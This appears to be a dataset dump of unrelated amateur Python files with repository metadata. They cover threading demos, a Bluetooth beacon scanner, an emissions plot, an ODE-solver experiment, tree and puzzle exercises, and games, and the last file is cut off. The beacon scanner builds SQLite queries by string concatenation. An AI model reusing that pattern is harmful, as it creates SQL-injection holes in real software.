50b1e5e598ec042cd656526f3dcf585ae6e68a38 | Python | akiraboy/python_20191010 | /collections_tbier/zad_7.py | UTF-8 | 238 | 3.921875 | 4 | [] | no_license | napis = input("POdaj ciag znaków: ")
samogloski = ['a', 'e', 'i', 'o', 'u', 'y']
ile_samoglosek = 0
for znak in napis:
if znak in samogloski:
ile_samoglosek += 1
print(f"Znaleziono samoglosek: {ile_samoglosek}") | true |
30be00a608cfe4674ffbba5469ad8e9a554c0f06 | Python | git-metal/python-learn | /python-lib/Concurrent/test_threading.py | UTF-8 | 1,450 | 3.359375 | 3 | [] | no_license |
import threading
from time import ctime, sleep
class MyThread(threading.Thread):
def __init__(self, func, args, name=""):
# threading.Thread.__init__(self)
super(MyThread, self).__init__()
self.name = name
self.func = func
self.args = args
def run(self):
print("run MyThread")
self.func(*self.args)
def music(name):
for i in range(2):
print("I was listening to %s. %s" % (name, ctime()))
sleep(1)
pass
def move(name):
for i in range(2):
print("I was at the %s! %s" % (name, ctime()))
sleep(1)
def super_play(file, time):
for i in range(2):
print('Start playing: %s! %s' % (file, ctime()))
sleep(time)
if __name__ == "__main__":
threads = []
t1 = threading.Thread(target=music, args=("光年之外",))
threads.append(t1)
t2 = threading.Thread(target=move, args=("正义联盟",))
threads.append(t2)
# test Thread function
for t in threads:
t.start()
t1.join()
t2.join()
print("end: %s" % ctime())
print(super_play.__name__)
# test Thread Class
in_list = {'光年之外': 3, '正义联盟': 5}
threads = []
for k, v in in_list.items():
t = MyThread(super_play, (k, v), super_play.__name__)
threads.append(t)
for t in threads:
t.start()
sleep(5)
| true |
ce6a2a0741353d427a4dc4bead7f9dffa514191f | Python | lukaszmitka/beacon_detector | /scanner.py | UTF-8 | 2,472 | 2.6875 | 3 | [] | no_license | from bluepy.btle import Scanner, DefaultDelegate
import sqlite3
import datetime
class ScanDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
def handleDiscovery(self, dev, isNewDev, isNewData):
if isNewDev:
print "Discovered device", dev.addr
elif isNewData:
print "Received new data from", dev.addr
def create_table(db_conn):
cursor = db_conn.cursor()
cursor.execute("CREATE TABLE IF NOT EXISTS `Beacons` (id INTEGER PRIMARY KEY AUTOINCREMENT, address STRING NOT NULL, rssi REAL NOT NULL, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, UNIQUE(address));")
db_conn.commit()
def update_device_status(db_conn, device_adress, rssi):
cursor = db_conn.cursor()
time_now = datetime.datetime.now()
cursor.execute("INSERT OR IGNORE INTO `Beacons` (rssi, address, createdAt, updatedAt) VALUES('" + str(rssi) + "', '" + device_adress + "', '" + str(time_now) + "', '" + str(time_now) + "');")
cursor.execute("UPDATE `Beacons` SET rssi = '" + str(rssi) + "', updatedAt = '" + str(time_now) + "' WHERE address= '" + device_adress + "';")
db_conn.commit()
def delete_old_devices(db_conn, address_list):
cursor = db_conn.cursor()
time_now = datetime.datetime.now()
command = ""
if len(address_list)>0:
command = "DELETE FROM `Beacons` WHERE"
first_element = True
for address in address_list:
if first_element:
first_element = False
else:
command += " AND "
command += " address != '"
command += address
command += "' "
command +=";"
else:
command = "DELETE FROM `Beacons`;"
print command
cursor.execute(command)
db_conn.commit()
scanner = Scanner().withDelegate(ScanDelegate())
conn = sqlite3.connect('beacon_detected.sqlite')
create_table(conn)
while 1:
print "While loop"
devices = scanner.scan(1.0)
print "Detected devices %d" % (len(devices))
print "%s" % (devices)
addresses = list()
for dev in devices:
print "Device %s (%s), RSSI=%d dB" % (dev.addr, dev.addrType, dev.rssi)
update_device_status(conn, dev.addr, dev.rssi)
addresses.append(dev.addr)
delete_old_devices(conn, addresses)
# for (adtype, desc, value) in dev.getScanData():
# # print " %s = %s" % (desc, value)
# a = desc
| true |
b4155ca142b910a4062222acc6a9b0557edc9d7c | Python | ibiehler/isabelleb | /Labs/School Greenhouse Gas Emissions/ghg_lab.py | UTF-8 | 4,281 | 3.796875 | 4 | [] | no_license |
'''
Greenhouse gas emissions (GHG) vs. square footage for all school buildings in Chicago
Data set used will be Chicago Energy Benchmark info from 2018
data can be found at...
https://data.cityofchicago.org/api/views/xq83-jr8c/rows.csv?accessType=DOWNLOAD
Energy Efficiency of Chicago Schools (35pts)
Chicago requires that all buildings over 50000 square feet in the city comply with energy benchmark reporting each year.
The dataset at the link above is that data from 2015 to 2018.
We will use this data to look at schools. We will visualize the efficiency of schools by scatter plot.
We expect that the more square footage (sqft) a school is, the more greenhouse gas (ghg) emission it will produce.
Challenge (for fun):
An efficient school would have a large ratio of sqft to ghg.
It would also be interesting to know where Parker lies on this graph??? Let's find out.
Make a scatterplot which does the following:
- Scatter plot the Total Greenhouse gas (GHG) Emmissions (y-axis), versus building square footage (x-axis) (10pts) *
- Data includes ONLY data for K-12 Schools. (5pts) *
- Data includes ONLY data for 2018 reporting. (5pts) *
- Label x and y axis and give appropriate title. (5pts) *
- Annotate Francis W. Parker. (5pts) *
- Create a best fit line for schools shown. (5pts) *
Extra Credit: Add a significant feature to your graph that helps tell the story of your data.
(feel free to use methods from matplotlib.org). (10pts)
Note: With extra credit you will earn you a max of 35pts (100%) for the assignment.
Maybe you can try one of the following or think up your own:
- Annotated labels (school name) for the 3 highest and 3 lowest GHG Intensities.
- Make schools in top 10 percent of GHG Intensity show in green.
- Make schools in bottom 10 percent GHG Intesity show in red.
- Add colleges and universities (use a different marker type)
Note 2: This is a tough assignment to do on your own. Do your best with what you have.
'''
import csv
import requests
import numpy as np
import matplotlib.pyplot as plt
def get_data(url):
with requests.Session() as s:
download = s.get(url)
content = download.content.decode('utf-8')
reader = csv.reader(content.splitlines(), delimiter=',')
my_list = list(reader)
return my_list
data = get_data("https://data.cityofchicago.org/api/views/xq83-jr8c/rows.csv?accessType=DOWNLOAD")
header = data.pop(0)
print(header)
ghg_index = header.index("Total GHG Emissions (Metric Tons CO2e)")
sqft_index = header.index("Gross Floor Area - Buildings (sq ft)")
type_index = header.index("Primary Property Type")
valid_ish_data = []
valid_data = []
for building in data:
try:
int(building[ghg_index])
int(building[sqft_index])
if building[type_index] == "K-12 School":
valid_ish_data.append(building)
except:
pass
for section in valid_ish_data:
if section[0] == "2018":
valid_data.append(section)
print(valid_data)
ghg = [int(x[ghg_index]) for x in valid_data]
sqft = [int(x[sqft_index]) for x in valid_data]
plt.ylabel("Total Greenhouse Gas (GHG) Emmissions")
plt.xlabel("Building Square Footage")
plt.title("Energy Efficiency of Chicago Schools in 2018")
# annotation; Parker was not within the 2018 data so I annotated for Latin instead
schools = []
for school in valid_data:
schools.append(school[2])
for i in range(len(schools)):
if schools[i] == "Latin School of Chicago Upper School":
plt.annotate(schools[i], xy=(sqft[i], ghg[i]), fontsize=5)
# best fit line
p = np.polyfit(sqft, ghg, 1) # (x, y, order) linear is 1st order
print(p)
x = [x for x in range(500000)]
y = [p[0] * y + p[1] for y in x] # linear first order
plt.plot(x, y)
# extra credit: Make schools in bottom 10 percent GHG Intensity show in red.
ghg_intensity = []
lowest_intensity = []
color = []
for intensity in valid_data:
ghg_intensity.append(float(intensity[-4]))
ghg_intensity.sort()
lowest_intensity.append(ghg_intensity[:3])
print(lowest_intensity[0])
for intensity in valid_data:
if lowest_intensity[0][2] >= float(intensity[-4]):
color.append("red")
else:
color.append("green")
plt.figure(1, tight_layout=True)
plt.scatter(sqft, ghg, alpha=0.3, c=color)
plt.show()
| true |
6dbe60c72d7495e4fedc5daa877f280a2b02b25e | Python | sWizad/diffeqsolver | /main5.py | UTF-8 | 8,668 | 3.0625 | 3 | [] | no_license | """ NN to solve 1st order ODE problems
based on Rosenbrock Euler method
"""
# Import the required modules
from __future__ import division
import numpy as np
import os, sys
import matplotlib.pyplot as plt
import tensorflow as tf
from utils import colored_hook
# tf.enable_eager_execution()
# This makes the plots appear inside the notebook
from scipy.integrate import odeint
# Define a function which calculates the derivative
def func(y, x):
return x - y
#return -.5*y
#return x -.7*y*y
#return 1.01-y*y
n = 20
xs = np.linspace(0.0,5,n)
dt = 5/(n-1)
y0 = 1.0 # the initial condition
# scipy solver
ys = odeint(func, y0, xs)
y_scipy = np.array(ys).flatten()
# (forward) Euler's Method
y_euler = np.zeros(np.shape(xs))
y_euler[0] = y0
#y_euler2 = np.zeros(np.shape(xs))
#y_euler2[0] = y0
for i in range(1,n):
x = xs[i-1]
y = y_euler[i-1]
y_euler[i] = y + dt*func(y,x)
#y = y_euler2[i-1]
#y_euler2[i] = y + np.exp(np.log(dt)+np.log(np.maximum( func(y,x),1e-7)))
#y_euler2[i] -= np.exp(np.log(dt)+np.log(np.maximum(-func(y,x),1e-7)))
def _build_solver( x, reuse=False):
with tf.variable_scope('solver') as scope:
if reuse:
scope.reuse_variables()
nin = x.get_shape()[-1].value
with tf.variable_scope('1log-Relu'):
nh1 = 1
scale_int = np.zeros((nin,nh1))
#scale_int[0][0] = 1.0
#scale_int[2][1] = 1.0
#scale_int[2][2] = -1.0
#scale_int[3][3] = 1.0
w1 = tf.get_variable("w1", [nin, nh1], initializer=tf.constant_initializer(scale_int), trainable=True)
b1 = tf.get_variable("b1", [nh1], initializer=tf.constant_initializer(-1.0), trainable=True)
h1 = tf.matmul(x, w1)+b1
h1 = tf.math.log(tf.math.maximum(tf.nn.relu( h1 ),1e-9), name = 'h1')
with tf.variable_scope('2expo'):
nh2 = 2
scale_int = np.zeros((nh1+nin,nh2))
scale_int[1][0] = 1.0
#scale_int[3][0] = 1.0
scale_int[2][1] = 1.0
#scale_int[3][1] = 1.0
#scale_int[0][2] = 1.0
#scale_int[0][3] = -1.0
w2 = tf.get_variable("w2", [nh1+nin, nh2], initializer=tf.constant_initializer(scale_int), trainable=True)
b2 = tf.get_variable("b2", [nh2], initializer=tf.constant_initializer(0.0), trainable=True)
pp = tf.concat([h1,x],1)
h2 = tf.math.minimum(tf.matmul(pp, w2)+b2,10)
h2 = tf.math.exp( h2, name='h2')
with tf.variable_scope('3final'):
nh3 = 1
scale_int = np.zeros((nh2+nin,nh3))
w3 = tf.get_variable("w3", [nh2+nin, 1], initializer=tf.constant_initializer(scale_int), trainable=True)
b3 = tf.get_variable("b3", [1], initializer=tf.constant_initializer(1.0), trainable=True)
pp = tf.concat([h2,x],1)
h3 = tf.add(tf.matmul(pp, w3), b3, name='h3')
#h3=h1
with tf.variable_scope('4model'):
# Model 1
z = tf.math.exp(h3*x[:,3])*(x[:,0]+x[:,3]*(x[:,2]-h3*x[:,0]))
# Model 2
#z = x[:,0]+x[:,3]*(x[:,2]+h3*x[:,3])
return z
def fun2():
input_layer = tf.placeholder('float32', shape=[None, 4], name = "input")
yn0, x0, fn0, dx = input_layer[:, 0], input_layer[:, 1], input_layer[:, 2], input_layer[:, 3]
with tf.variable_scope('Step-y1'):
yn1 = _build_solver(input_layer)
yn1 = yn1[:,0]
fn1 = func(yn1,x0+1.0*dx)
#print("Hey")
# with tf.variable_scope('Step-y05'):
g05 = tf.stack([yn0,x0,fn0,dx/2],axis=1)
yn05 = _build_solver(g05, reuse = True)
yn05 = yn05[:,0]
fn05= func(yn05,x0+0.5*dx)
# with tf.variable_scope('Step-y10'):
g10 = tf.stack([yn05,x0+0.5*dx,fn05,dx/2],axis=1)
yn10 = _build_solver(g10, reuse = True)
yn10 = yn10[:,0]
fn10= func(yn10,x0+1.0*dx)
#g15 = tf.stack([yn1[:,0],x0+dx,fn1[:,0],dx/2],axis=1)
#yn15 = _build_solver(g15, reuse = True)
#fn15= func(yn15,x0+1.5*dx)
#g20 = tf.stack([yn1[:,0],x0+1.0*dx,fn1[:,0],dx],axis=1)
#yn20 = _build_solver(g20, reuse = True)
#fn20= func(yn20,x0+2.0*dx)
with tf.variable_scope('loss'):
ode_loss = 0.00*tf.reduce_mean(tf.square(yn1 -yn0 -dx*fn0)) # forward Euler
ode_loss += tf.reduce_mean(tf.square(yn1 -yn10))
#ode_loss += tf.reduce_mean(tf.square(yn1 - yn0-dx*(fn0+fn1)/2)) # backward Euler
#ode_loss = tf.reduce_mean(tf.square(yn1 - yn0-dx*(fn0+2*fn05+fn1)/4)) #1/2 Simpson
#ode_loss += tf.reduce_mean(tf.square(yn1 - yn0-dx*(fn0+4*fn05+fn10)/6)) #1/3 Simpson
#ode_loss = tf.reduce_mean(tf.square(yn20 - yn0-dx*(fn0+4*fn05+2*fn1+4*fn15+fn20)/6)) #1/3 Simpson
#ode_loss = tf.reduce_mean(tf.square(yn20-4/3*yn1 +1/3*yn0-dx*(fn20)*2/3)) #BDF2
err_est = tf.reduce_mean(tf.square(yn1-yn10))
learn_rate = 0.001
optimizer = tf.train.AdamOptimizer(learn_rate).minimize(ode_loss)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
writer = tf.summary.FileWriter("log")
writer.add_graph(sess.graph)
summary = tf.summary.merge([
tf.summary.scalar("loss", ode_loss)])
print("Train Step")
batch_size = 1000
hm_epochs = 10001
for index in range(hm_epochs):
y_center = np.random.rand(1)[0]*2
x_center = np.random.rand()*6
dt_center = np.random.rand(1)[0]*dt#*0.5
input = []
x = 0.1
for i in range(batch_size):
y = np.random.randn()/2 + y_center
x = np.random.randn() + x_center
dt_train = max(np.random.rand()*dt/2+dt_center,1e-10)
input.append([y,x,func(y,x),dt_train])
_,lloss = sess.run([optimizer,ode_loss],feed_dict={input_layer:input})
#lloss = sess.run(ode_loss,feed_dict={input_layer:input})
summ = sess.run(summary, feed_dict={input_layer:input})
writer.add_summary(summ,index)
if index%200==0:
print(index, lloss)
print("Test Step")
x = 0.1
y_nn= np.zeros(np.shape(xs))
y_nn[0] = y0
y_nn2= np.zeros(np.shape(xs))
y_nn2[0] = y0
y = y0
lloss = 0.0
dt_train = dt
for i in range(1,n):
y = y_nn[i-1]
input = [[y,x,func(y,x),dt_train]]
ynn,loss = sess.run([yn1,ode_loss],feed_dict={input_layer:input})
y_nn[i] = ynn[0]
y = y_nn2[i-1]
input = [[y,x,func(y,x),dt_train/2]]
ynn,loss = sess.run([yn10,ode_loss],feed_dict={input_layer:input})
input = [[ynn,x+dt_train/2,func(ynn,x+dt_train/2),dt_train/2]]
ynn2,loss = sess.run([yn10,ode_loss],feed_dict={input_layer:input})
y_nn2[i] = ynn2[0]
x += dt_train
print(i,"Err",loss)
lloss += loss
#print('Test Step:', lloss)
# Plot the numerical solution
#plt.rcParams.update({'font.size': 14}) # increase the font size
#plt.xlabel("x")
#plt.ylabel("y")
#y_exact = xs - 1 + 2*np.exp(-xs)
#plt.plot(xs, y_scipy);
#plt.plot(xs, y_euler, ".");
#plt.plot(xs, y_nn, "+");
#plt.plot(xs, y_nn2, "+");
#plt.show()
def recur(y,x,dt,err_max=1e-4):
input = [[y,x,func(y,x),dt_train]]
ynn,loss = sess.run([yn10,err_est],feed_dict={input_layer:input})
if loss<err_max or dt<5e-3:
return ynn
else:
print("x=",x,", dt=",dt,", err =", loss)
return recur(recur(y,x,dt/2,err_max),x+dt/2,dt/2,err_max)
print("Test loop")
x = 0.0
y_lp= np.zeros(np.shape(xs))
y_lp[0] = y0
y = y0
dt_train = dt
for i in range(1,n):
y = y_nn[i-1]
ynn = recur(y,x,dt,5e-6)
y_lp[i] = ynn[0]
x += dt_train
plt.figure()
ax = plt.subplot(2,1,1)
y_exact = xs - 1 + 2*np.exp(-xs)
plt.plot(xs,abs(y_exact-y_scipy))
plt.plot(xs,abs(y_exact-y_euler),"+")
plt.plot(xs,abs(y_exact-y_nn),".")
plt.plot(xs,abs(y_exact-y_nn2),".")
#plt.plot(xs,abs(y_exact-y_lp),"^")
print(abs(y_exact-y_lp))
ax = plt.subplot(2,1,2)
plt.plot(xs,y_scipy)
plt.plot(xs,y_euler,"+")
plt.plot(xs,y_nn,".")
plt.plot(xs,y_nn2,".")
#plt.plot(xs,y_lp,"^")
plt.show()
def main(arv):
fun2()
if __name__ == "__main__":
sys.excepthook = colored_hook(
os.path.dirname(os.path.realpath(__file__)))
tf.app.run()
#y_diff = np.abs(y_exact - y_scipy)
#plt.semilogy(xs, y_diff)
#plt.ylabel("Error")
#plt.xlabel("x")
#plt.title("Error in numerical integration");
# Note the logarithmic scale on the y-axis.
| true |
9dc55b66267bf64baac83be1e6d6f798c9d96468 | Python | redixhumayun/ctci | /HackerRank/projectEuler.py | UTF-8 | 1,448 | 3.421875 | 3 | [] | no_license | import unittest
import pdb
from fractions import Fraction
def findSumOfProducts(number):
result = 0
for num in range(5, number + 1):
pdb.set_trace()
result += findMaxProduct(num)
return result
def findMaxProduct(n):
max_value = 0
for divisor in range(1, n):
product = Fraction(n**divisor, divisor**divisor)
if product > max_value:
max_value = product
return isTerminating(max_value.numerator, max_value.denominator)
def isTerminating(num, den):
numCopy = num
denCopy = den
while den % 2 == 0:
den = den / 2
while den % 5 == 0:
den = den / 5
return (-1 * (numCopy / denCopy)) if den == 1 else (numCopy / denCopy)
class TestProjectEuler(unittest.TestCase):
def setUp(self):
pass
def test_isTerminatingPos(self):
num = 2
den = 3
result = isTerminating(num, den)
self.assertEqual(result, 0.6666666666666666)
def test_isTerminatingNeg(self):
num = 5
den = 2
result = isTerminating(num, den)
self.assertEqual(result, -2.5)
def test_findMaxProduct(self):
num = 8
result = findMaxProduct(num)
self.assertEqual(round(result, 9), 18.962962963)
def test_findSumOfProducts(self):
number = 100
result = findSumOfProducts(number)
self.assertEqual(result, 2438)
if __name__ == "__main__":
unittest.main()
| true |
551d351319962976d1c5729157cc9c054385d368 | Python | Ro9ueAdmin/django-orchestra | /orchestra/permissions/options.py | UTF-8 | 3,550 | 3.0625 | 3 | [
"BSD-3-Clause"
] | permissive | import functools
import inspect
# WARNING: *MAGIC MODULE*
# This is not a safe place, lot of magic is happening here
class Permission(object):
"""
Base class used for defining class and instance permissions.
Enabling an ''intuitive'' interface for checking permissions:
# Define permissions
class NodePermission(Permission):
def change(self, obj, cls, user):
return obj.user == user
# Provide permissions
Node.has_permission = NodePermission()
# Check class permission by passing it as string
Node.has_permission(user, 'change')
# Check class permission by calling it
Node.has_permission.change(user)
# Check instance permissions
node = Node()
node.has_permission(user, 'change')
node.has_permission.change(user)
"""
def __get__(self, obj, cls):
""" Hacking object internals to provide means for the mentioned interface """
# call interface: has_permission(user, 'perm')
def call(user, perm):
return getattr(self, perm)(obj, cls, user)
# has_permission.perm(user)
for func in inspect.getmembers(type(self), predicate=inspect.ismethod):
if not isinstance(self, func[1].__self__.__class__):
# aggregated methods
setattr(call, func[0], functools.partial(func[1], obj, cls))
else:
# self methods
setattr(call, func[0], functools.partial(func[1], self, obj, cls))
return call
def _aggregate(self, obj, cls, perm):
""" Aggregates cls methods to self class"""
for method in inspect.getmembers(perm, predicate=inspect.ismethod):
if not method[0].startswith('_'):
setattr(type(self), method[0], method[1])
class ReadOnlyPermission(Permission):
""" Read only permissions """
def view(self, obj, cls, user):
return True
class AllowAllPermission(object):
""" All methods return True """
def __get__(self, obj, cls):
return self.AllowAllWrapper()
class AllowAllWrapper(object):
""" Fake object that always returns True """
def __call__(self, *args):
return True
def __getattr__(self, name):
return lambda n: True
class RelatedPermission(Permission):
"""
Inherit permissions of a related object
The following example will inherit permissions from sliver_iface.sliver.slice
SliverIfaces.has_permission = RelatedPermission('sliver.slices')
"""
def __init__(self, relation):
self.relation = relation
def __get__(self, obj, cls):
""" Hacking object internals to provide means for the mentioned interface """
# Walk through FK relations
relations = self.relation.split('.')
if obj is None:
parent = cls
for relation in relations:
parent = getattr(parent, relation).field.rel.to
else:
parent = functools.reduce(getattr, relations, obj)
# call interface: has_permission(user, 'perm')
def call(user, perm):
return parent.has_permission(user, perm)
# method interface: has_permission.perm(user)
for name, func in parent.has_permission.__dict__.items():
if not name.startswith('_'):
setattr(call, name, func)
return call
| true |
42a2887dc16e67b1f43de510a505912a05a87061 | Python | Debdut24/Pong | /puddle.py | UTF-8 | 478 | 3.734375 | 4 | [] | no_license | from turtle import Turtle
class Puddle(Turtle):
def __init__(self, x, y):
super().__init__()
self.x = x
self.y = y
self.color("white")
self.shape("square")
self.penup()
self.shapesize(stretch_wid=5, stretch_len=1)
self.goto(x, y)
def move_up(self):
y_pos = self.ycor()
self.goto(self.x, y_pos+20)
def move_down(self):
y_pos = self.ycor()
self.goto(self.x, y_pos - 20) | true |
782c4d867fe81a436f2dd6c061ee2bbd7f5f8eba | Python | purnima64/DS_Titanic | /basic_fun.py | UTF-8 | 2,280 | 3.6875 | 4 | [] | no_license | import numpy as np
import pandas as pd
def basic_df_exploration(df):
"""
Provides basic data exploration details
Params:
-------
df: pandas dataframe
Returns:
--------
None
Prints the following output:
- Shape
- Column name and respective types
- Descriptive stats
- Columns with null values and respective count
- Outliers per column if any
"""
print('\n====================BASIC EXPLORATION====================\n')
# Printing rows and columns
print('Dataframe has {} rows and {} columns\n'.format(str(df.shape[0]), str(df.shape[1])))
# Printing column name and its respective dtypes
print('Column names and its respective types')
print('-------------------------------------\n')
print(df.info())
print('')
# Printing Descriptive stats for numeric columns
print('Descriptive stats for numeric columns')
print('-------------------------------------\n')
print(df.describe())
print('')
# Printing Descriptive stats for categorical columns
print('Descriptive stats for categorical columns')
print('-----------------------------------------\n')
print(df.describe(include='object'))
print('')
# Printing column with null values
print('Columns with null values and respective counts\n')
print('----------------------------------------------\n')
print(df.isnull().sum()[df.isnull().sum() > 0])
print('')
# Printing outliers for columns
print('Checking for outliers in numeric columns')
print('----------------------------------------')
for c in df.select_dtypes(exclude='object').columns:
print('Outliers in column {}:'.format(c))
outliers = iqr_outliers(df[c])
if outliers:
print(set(outliers))
print('')
else:
print('No outliers\n')
print('\n====================DONE====================\n')
def iqr_outliers(arr):
iqr75 = np.nanpercentile(arr, 75)
iqr25 = np.nanpercentile(arr, 25)
iqr = iqr75-iqr25
upper_bound = iqr75 + (iqr*1.5)
lower_bound = iqr25 - (iqr*1.5)
return [i for i in arr if (upper_bound<i or lower_bound>i)]
if __name__ == "__main__":
df = pd.read_csv('mall_data.txt')
basic_df_exploration(df) | true |
64769cc0532a2e48c4e607781a4cc342dbcf5d74 | Python | LCDG-tim/2020-exos | /arbres3.py | UTF-8 | 2,185 | 3.421875 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 24 15:37:37 2020
@author: timot
"""
class ABR:
def __init__(self,val):
self.valeur=val
self.gauche=None
self.droite=None
def inserer(self,x):
if x<self.valeur:
if self.gauche!=None:# si il y a un noeud à gauche
self.gauche.inserer(x)
else:
self.gauche=ABR(x)
else:
if self.droite!=None:
self.droite.inserer(x)
else:
self.droite=ABR(x)
def affiche(self):
"""permet d'afficher un arbre"""
if self == None: # si l'arbre est vide
return None
else :
return [
self.valeur,ABR.affiche(self.gauche),ABR.affiche(self.droite)
]
def taille(self):
"""donne la taille d'un arbre cad le nombre de feuilles """
if self==None:
return 0
else :
return 1+ABR.taille(self.gauche)+ABR.taille(self.droite)
def rechecher(self, val) -> bool:
ret_val = False
if self.valeur > val:
if self.gauche is not None:
ret_val = self.gauche.rechecher(val)
elif self.valeur < val:
if self.droite is not None:
ret_val = self.droite.rechecher(val)
else:
ret_val = True
return ret_val
def hauteur(self):
if self==None:
return 0
elif self.gauche==None and self.droite==None:
return 0
else :
return 1+max(ABR.hauteur(self.gauche),ABR.hauteur(self.droite))
def getValeur(self):
return self.valeur
def mini(self):
if self.gauche is None:
return self.valeur
else:
return self.gauche.mini()
def maxi(self):
if self.droite is None:
return self.valeur
else:
return self.droite.maxi()
def listeEnArbre(l: list):
abr = ABR(l[0])
for i in l[1:]:
abr.inserer(i)
return abr
if __name__ == "__main__":
a = listeEnArbre([45,245,185,15,6,165,15,456,465,46,451,56,16,446]) | true |
ccbdfe9e20b716053ce7e286dc1b4f060a9b40a4 | Python | aspcodenet/IotListLabbar | /IotListLabbar/Lab1.py | UTF-8 | 199 | 3.59375 | 4 | [] | no_license |
lista = []
for i in range(0,4):
lista.append(int(input(f"Mata in tal {i+1}:")))
largestSoFar = lista[0]
for i in lista:
if i > largestSoFar:
largestSoFar = i
print(largestSoFar)
| true |
3e3c620aa3287ba9266d0eb61a0d92a45c0e7e5a | Python | runzezhang/Code-NoteBook | /lintcode/1243-number-of-segments-in-a-string.py | UTF-8 | 1,475 | 3.828125 | 4 | [
"Apache-2.0"
] | permissive | Description
中文
English
Count the number of segments in a string, where a segment is defined to be a contiguous sequence of non-space characters.
the string does not contain any non-printable characters.
Have you met this question in a real interview?
Example
Example:
Input: "Hello, my name is John"
Output: 5
Explanation:There are five string "Hello"、"my"、"name"、"is"、"John"
class Solution:
"""
@param s: a string
@return: the number of segments in a string
"""
def countSegments(self, s):
# write yout code here
return len(s.split())
# 本参考程序来自九章算法,由 @九章算法助教团队 提供。版权所有,转发请注明出处。
# - 九章算法致力于帮助更多中国人找到好的工作,教师团队均来自硅谷和国内的一线大公司在职工程师。
# - 现有的面试培训课程包括:九章算法班,系统设计班,算法强化班,Java入门与基础算法班,Android 项目实战班,
# - Big Data 项目实战班,算法面试高频题班, 动态规划专题班
# - 更多详情请见官方网站:http://www.jiuzhang.com/?source=code
class Solution:
"""
@param s: a string
@return: the number of segments in a string
"""
def countSegments(self, s):
# write yout code here
res = 0
for i in range(len(s)):
if s[i] != ' ' and (i == 0 or s[i - 1] == ' '):
res += 1
return res | true |
37e9c844ce04a3c8f7af90584a1609da00787292 | Python | kdungs/adventofcode | /2021/05.py | UTF-8 | 1,434 | 3.78125 | 4 | [] | no_license | #!/usr/bin/env python3
from collections import defaultdict
with open("data/05.txt") as f:
lines = f.readlines()
points = defaultdict(int)
for line in lines:
left, right = line.split(" -> ")
x1, y1 = map(int, left.split(","))
x2, y2 = map(int, right.split(","))
if x1 != x2 and y1 != y2:
# not a horizontal or vertical line
continue
for x in range(min(x1, x2), max(x1, x2) + 1):
for y in range(min(y1, y2), max(y1, y2) + 1):
points[(x, y)] += 1
intersections = sum(v > 1 for v in points.values())
print(intersections)
# Part 2
points = defaultdict(int)
for line in lines:
left, right = line.split(" -> ")
x1, y1 = map(int, left.split(","))
x2, y2 = map(int, right.split(","))
if x1 == x2:
# Vertical
x = x1
for y in range(min(y1, y2), max(y1, y2) + 1):
points[(x, y)] += 1
elif y1 == y2:
# Horizontal
y = y1
for x in range(min(x1, x2), max(x1, x2) + 1):
points[(x, y)] += 1
else:
# Diagonal (by definition)
# Verify!
dx = x2 - x1
dy = y2 - y1
assert(abs(dy / dx) == 1)
sx = dx / abs(dx)
sy = dy / abs(dy)
for i in range(abs(dx) + 1):
x = x1 + sx * i
y = y1 + sy * i
points[(x, y)] += 1
intersections = sum(v > 1 for v in points.values())
print(intersections)
| true |
ceb98003f824c3a85ed547bbbc63f7a47354fdde | Python | javierwilson/commcare-hq | /corehq/blobs/tests/util.py | UTF-8 | 940 | 2.609375 | 3 | [] | no_license | from shutil import rmtree
from tempfile import mkdtemp
import corehq.blobs as blobs
from corehq.blobs.fsdb import FilesystemBlobDB
class TemporaryFilesystemBlobDB(FilesystemBlobDB):
"""Create temporary blob db and install as global blob db
Global blob DB can be retrieved with `corehq.blobs.get_blob_db()`
"""
def __init__(self):
rootdir = mkdtemp(prefix="blobdb")
super(TemporaryFilesystemBlobDB, self).__init__(rootdir)
blobs._db.append(self)
try:
# verify get_blob_db() returns our new db
assert blobs.get_blob_db() is self, 'got wrong blob db'
except:
self.close()
raise
def close(self):
try:
blobs._db.remove(self)
finally:
rmtree(self.rootdir)
self.rootdir = None
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
| true |
03c879bb46dee0e3eba046547eae73819ecf1ae1 | Python | ChidinmaKO/Chobe-Py-Challenges | /bites/bite155.py | UTF-8 | 1,397 | 3.828125 | 4 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | import re
import shlex
def split_words_and_quoted_text(text):
"""Split string text by space unless it is
wrapped inside double quotes, returning a list
of the elements.
For example
if text =
'Should give "3 elements only"'
the resulting list would be:
['Should', 'give', '3 elements only']
"""
# using shlex
# return shlex.split(text)
# using re
result = list()
pattern = re.findall(r'\w+\s*|\".+?\"', text)
for char in pattern:
result.append(char.strip().replace('"', ''))
return result
# tests
import pytest
from split import split_words_and_quoted_text
some_strings = (
'Should give "3 words only"',
'Our first program was "Hello PyBites"',
'Because "Hello World" is really cliche',
('PyBites is a "A Community that Masters '
'Python through Code Challenges"')
)
expected_returns = (
['Should', 'give', '3 words only'],
['Our', 'first', 'program', 'was', 'Hello PyBites'],
['Because', 'Hello World', 'is', 'really', 'cliche'],
['PyBites', 'is', 'a', ('A Community that Masters Python '
'through Code Challenges')]
)
@pytest.mark.parametrize("arg, ret",
zip(some_strings, expected_returns))
def test_split_words_and_quoted_text(arg, ret):
assert split_words_and_quoted_text(arg) == ret | true |
83339f9e2e2f9ab76f41bd75814dd4b58b599d38 | Python | fernandochimi/python-data-analysis | /python_data_analysis/chapter_03/03-linear-algebra.py | UTF-8 | 221 | 3.078125 | 3 | [] | no_license | # coding: utf-8
import numpy as np
A = np.mat("2 4 6; 4 2 6; 10 -4 18")
print "A\n", A
inverse = np.linalg.inv(A)
print "Inverse of A\n", inverse
print "Check\n", A * inverse
print "Error\n", A * inverse - np.eye(3)
| true |
c0d48ae35700a9bf4baf94fa1e6b3f32030fbfc0 | Python | maxdatascience/tic-tac-toe | /tic-tac-toe.py | UTF-8 | 3,270 | 4.1875 | 4 | [] | no_license | import random
def display_board(board):
print('\n'*100)
print(f"| {board[7]} | {board[8]} | {board[9]} |")
print("-------------")
print(f"| {board[4]} | {board[5]} | {board[6]} |")
print("-------------")
print(f"| {board[1]} | {board[2]} | {board[3]} |")
def player_input():
"""
OUTPUT = (Player 1 marker, Player 2 marker)
"""
marker = ''
while not (marker == 'X' or marker == 'O'):
marker = input('Player1: Choose X or O: ').upper()
if marker == 'X':
return ('X', 'O')
else:
return ('O', 'X')
